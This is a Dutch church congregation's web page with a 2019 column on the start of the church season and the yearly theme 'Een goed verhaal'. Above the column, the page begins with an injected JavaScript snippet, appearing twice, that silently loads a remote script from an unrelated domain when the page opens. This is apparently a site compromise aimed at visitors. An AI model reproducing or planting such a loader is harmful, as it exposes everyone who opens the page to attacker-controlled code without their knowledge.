;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); On the road again! - PKN Damwâld

On the road again!

Gepubliceerd op: maandag 26 augustus 2019

“On the road again!  Just can’t wait to get on the road again…” Ken je dit liedje van Willie Nelson? Op de een of andere manier kwam deze tekst in me op bij het schrijven van deze column.

Zondag 15 september is het weer startzondag in onze kerk. Startzondag, het woord zegt het al, is de zondag waarop het nieuwe kerkelijke ‘winterseizoen’ weer start. Niet dat de kerk in de zomer dicht is geweest of dat het kerkelijke gebeuren stil heeft gelegen, maar ieder jaar in september is er een startzondag waarna al het gemeentewerk, kerkdiensten, gespreksgroepen, jeugdwerk, vergaderingen en noem maar op, weer volop gaan draaien.

Ook dit ‘winterseizoen’ volgen we het (PKN-) jaarthema ‘Een goed verhaal’. Zoals op de webpagina www.protestantsekerk.nl/thema/startzondag zo mooi staat beschreven leven en werken we in de kerk vanuit het goede verhaal dat ons in de Bijbel wordt verteld. Gods Woord in mensentaal, voor velen een bron van troost, bemoediging en inspiratie. Het goede verhaal van God en mensen is een spiegel voor ons dagelijkse leven. In de kerkdienst maar ook in gespreksgroepen, tijdens catechisatie, bezoekwerk en op allerlei andere plekken zijn we bezig met dat goede verhaal. Een goed verhaal laat namelijk niet koud, maar brengt in beweging. Een goed verhaal houd je niet voor jezelf, maar deel je graag met anderen.

Ook het komende winterseizoen mogen we in dat kader ons weer bezinnen op vragen als: wie zijn we als gemeente? Waar staan we voor, wat is onze missie en visie? Daarnaast wat komt er op ons af? Hoe zien we de toekomst van onze gemeente? En: wat is onze missionaire opdracht, onze roeping als christelijke gemeente?

Maar waarom zou je daaraan mee doen en, al is het af en toe, naar de kerk gaan? Omdat de kerk veel te bieden heeft! De kerk heeft namelijk een goed verhaal, een verhaal van liefde, mededogen en barmhartigheid. Dat is een ander verhaal dan je meestal in het nieuws, op televisie, van de reclame hoort. Toch heeft dit Bijbelse en christelijke geloofsverhaal voor een groot deel onze cultuur gevormd en profiteren we daar allemaal op allerlei manieren nog steeds van. In de kerk worden de wezenlijke, de echte en grote vragen van het leven gesteld, niet om daar direct een kant en klaar antwoord op te geven, maar om daar samen naar op zoek te gaan. De kerk biedt daarin een tegenverhaal en een plek waarin je jouw verhaal, jouw levensverhaal mag vertellen. Een plek waar je jezelf mag zijn, zoals je bent. Waar je je niet mooier of beter of anders voor hoeft te doen, waar je kwetsbaar mag zijn en waarin mensen  met elkaar proberen mee te leven. In de kerk worden verhalen verteld die je leven kunnen spiegelen, worden liederen gezongen die raken aan alle kanten van het leven, die je kunnen optillen en blij maken, zijn gebruiken en gebaren die je laten voelen dat je erbij hoort en dat het goed is dat je er bent.

‘On The Road Again’ … een heerlijk ‘startrefrein’ om mee te doen aan alle komende activiteiten, de kerk (weer) op te zoeken … om mee te nemen op je (levens-) reis met als metgezel de Here God. Op weg naar plekken (in je hart) waar je (wellicht) nooit ben geweest, om dingen te ontdekken die je ergens anders nooit zult zien, voor een goed verhaal, ja … om Hem echt te ontmoeten. Alle reden dus om mee op reis te gaan! De Weg, de Waarheid en het Leven. Wat kan een mens zich nog meer wensen?

Columnist:Kees

Leer mij kennen
Uitgelezen?

Gelukkig hebben wij meer columns!

Bekijk al onze columns